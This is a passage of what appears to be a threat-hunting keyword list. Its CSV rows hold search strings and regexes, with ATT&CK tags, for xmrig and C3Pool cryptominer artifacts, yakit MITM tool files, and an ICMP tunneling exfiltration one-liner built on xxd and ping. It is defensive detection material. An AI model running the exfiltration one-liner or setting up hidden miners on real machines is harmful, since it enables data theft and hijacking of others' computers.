background*",".{0,1000}\]\sRunning\sminer\sin\sthe\sbackground.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*08384f3f05ad85b2aa935dbd2e46a053cb0001b28bbe593dde2a8c4b822c2a7d*",".{0,1000}08384f3f05ad85b2aa935dbd2e46a053cb0001b28bbe593dde2a8c4b822c2a7d.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - 
T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*0tZG9uYXRlLWxldmVsP*",".{0,1000}0tZG9uYXRlLWxldmVsP.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*3b5cbf0dddc3ef7e3af7d783baef315bf47be6ce11ff83455a2165befe6711f5*",".{0,1000}3b5cbf0dddc3ef7e3af7d783baef315bf47be6ce11ff83455a2165befe6711f5.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*4fe9647d6a8bf4790df0277283f9874385e0cd05f3008406ca5624aba8d78924*",".{0,1000}4fe9647d6a8bf4790df0277283f9874385e0cd05f3008406ca5624aba8d78924.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*5575c76987333427f74263e090910eae45817f0ede6b452d645fd5f9951210c9*",".{0,1000}5575c76987333427f74263e090910eae45817f0ede6b452d645fd5f9951210c9.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" 
"*5a6e7d5c10789763b0b06442dbc7f723f8ea9aec1402abedf439c6801a8d86f2*",".{0,1000}5a6e7d5c10789763b0b06442dbc7f723f8ea9aec1402abedf439c6801a8d86f2.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*99e3e313b62bb8b55e2637fc14a78adb6f33632a3c722486416252e2630cfdf6*",".{0,1000}99e3e313b62bb8b55e2637fc14a78adb6f33632a3c722486416252e2630cfdf6.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*C3Pool mining setup script v*",".{0,1000}C3Pool\smining\ssetup\sscript\sv.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*C3Pool/xmrig_setup*",".{0,1000}C3Pool\/xmrig_setup.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*c3pool_miner service*",".{0,1000}c3pool_miner\sservice.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" 
"*c3pool_miner.bat*",".{0,1000}c3pool_miner\.bat.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*c3pool_miner.service*",".{0,1000}c3pool_miner\.service.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*c3pool_miner.sh*",".{0,1000}c3pool_miner\.sh.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*c3pool_miner\*",".{0,1000}c3pool_miner\\.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*cpulimit -e xmrig *",".{0,1000}cpulimit\s\-e\sxmrig\s.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*dd7fef5e3594eb18dd676e550e128d4b64cc5a469ff6954a677dc414265db468*",".{0,1000}dd7fef5e3594eb18dd676e550e128d4b64cc5a469ff6954a677dc414265db468.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - 
T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*Description=Monero miner service*",".{0,1000}Description\=Monero\sminer\sservice.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*donate.ssl.xmrig.com*",".{0,1000}donate\.ssl\.xmrig\.com.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*donate.v2.xmrig.com:3333*",".{0,1000}donate\.v2\.xmrig\.com\:3333.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*donate.xmrig.com*",".{0,1000}donate\.xmrig\.com.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*Downloading*%MINER_LOCATION%*",".{0,1000}Downloading.{0,1000}\%MINER_LOCATION\%.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*e1ff2208b3786cac801ffb470b9475fbb3ced74eb503bfde7aa7f22af113989d*",".{0,1000}e1ff2208b3786cac801ffb470b9475fbb3ced74eb503bfde7aa7f22af113989d.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*fee.xmrig.com*",".{0,1000}fee\.xmrig\.com.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*ff6e67d725ee64b4607dc6490a706dc9234c708cff814477de52d3beb781c6a1*",".{0,1000}ff6e67d725ee64b4607dc6490a706dc9234c708cff814477de52d3beb781c6a1.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*github*/xmrig/xmrig*",".{0,1000}github.{0,1000}\/xmrig\/xmrig.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*gpg_keys/xmrig.asc*",".{0,1000}gpg_keys\/xmrig\.asc.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*https://c3pool.com/#/*",".{0,1000}https\:\/\/c3pool\.com\/\#\/.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*killall xmrig*",".{0,1000}killall\sxmrig.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*LS1kb25hdGUtbGV2ZWw9*",".{0,1000}LS1kb25hdGUtbGV2ZWw9.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*mining in background will be started using your startup directory script and only work when your are logged in this host*",".{0,1000}mining\sin\sbackground\swill\sbe\sstarted\susing\syour\sstartup\sdirectory\sscript\sand\sonly\swork\swhen\syour\sare\slogged\sin\sthis\shost.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*Mining will happen to * wallet*",".{0,1000}Mining\swill\shappen\sto\s.{0,1000}\swallet.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - 
T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*Monero miner is already running in the background*",".{0,1000}Monero\sminer\sis\salready\srunning\sin\sthe\sbackground.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*nssm set xmrig AppNoConsole 1*",".{0,1000}nssm\sset\sxmrig\sAppNoConsole\s1.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*offline_miner_setup.zip*",".{0,1000}offline_miner_setup\.zip.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*randomx.xmrig.com*",".{0,1000}randomx\.xmrig\.com.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*set xmrig start*",".{0,1000}set\sxmrig\sstart.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*setup and run in background Monero CPU miner*",".{0,1000}setup\sand\srun\sin\sbackground\sMonero\sCPU\sminer.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*solo_mine_example.cmd*",".{0,1000}solo_mine_example\.cmd.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*src/xmrig.cpp*",".{0,1000}src\/xmrig\.cpp.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*src\xmrig.cpp*",".{0,1000}src\\xmrig\.cpp.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*start doing stuff: preparing miner*",".{0,1000}start\sdoing\sstuff\:\spreparing\sminer.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*support@c3pool.com*",".{0,1000}support\@c3pool\.com.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","#email","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*WinRing0*WinRing0x64.sys*",".{0,1000}WinRing0.{0,1000}WinRing0x64\.sys.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*xmrig-*-bionic-x64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-bionic\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*xmrig-*-focal-x64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-focal\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*xmrig-*-freebsd-static-x64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-freebsd\-static\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*xmrig-*-gcc-win64.zip*",".{0,1000}xmrig\-.{0,1000}\-gcc\-win64\.zip.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*xmrig-*-linux-static-x64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-linux\-static\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*xmrig-*-linux-x64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-linux\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*xmrig-*-macos-arm64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-macos\-arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*xmrig-*-macos-x64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-macos\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*xmrig-*-msvc-win64.zip*",".{0,1000}xmrig\-.{0,1000}\-msvc\-win64\.zip.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*xmrig.exe -*",".{0,1000}xmrig\.exe\s\-.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*xmrig.service*",".{0,1000}xmrig\.service.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*xmrig.tar.gz*",".{0,1000}xmrig\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*xmrig.zip*",".{0,1000}xmrig\.zip.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" 
"*xmrminer.cc*",".{0,1000}xmrminer\.cc.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*xmrpool.de*",".{0,1000}xmrpool\.de.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*xmrpool.eu*",".{0,1000}xmrpool\.eu.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*xmrpool.eu:3333*",".{0,1000}xmrpool\.eu\:3333.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*xmrpool.me*",".{0,1000}xmrpool\.me.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*xmrpool.net*",".{0,1000}xmrpool\.net.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*xmrpool.xyz*",".{0,1000}xmrpool\.xyz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*xxd -p -c 4 /* | while read line* do ping -c 1 -p *",".{0,1000}xxd\s\-p\s\-c\s4\s\/.{0,1000}\s\|\swhile\sread\sline.{0,1000}\sdo\sping\s\-c\s1\s\-p\s.{0,1000}","greyware_tool_keyword","xxd","ICMP Tunneling One Liner","T1090 - T1002 - T1016","TA0011 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "* set-proxy.ps1*",".{0,1000}\sset\-proxy\.ps1.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*""http://mitm""*",".{0,1000}\""http\:\/\/mitm\"".{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*/MITMPluginLogViewer*",".{0,1000}\/MITMPluginLogViewer.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & 
Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*/MITMServerHijacking*",".{0,1000}\/MITMServerHijacking.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*/set-proxy.ps1*",".{0,1000}\/set\-proxy\.ps1.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*/yak_darwin_amd64.zip*",".{0,1000}\/yak_darwin_amd64\.zip.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*/yak_linux_amd64.zip*",".{0,1000}\/yak_linux_amd64\.zip.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*/yak_windows_amd64.zip*",".{0,1000}\/yak_windows_amd64\.zip.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & 
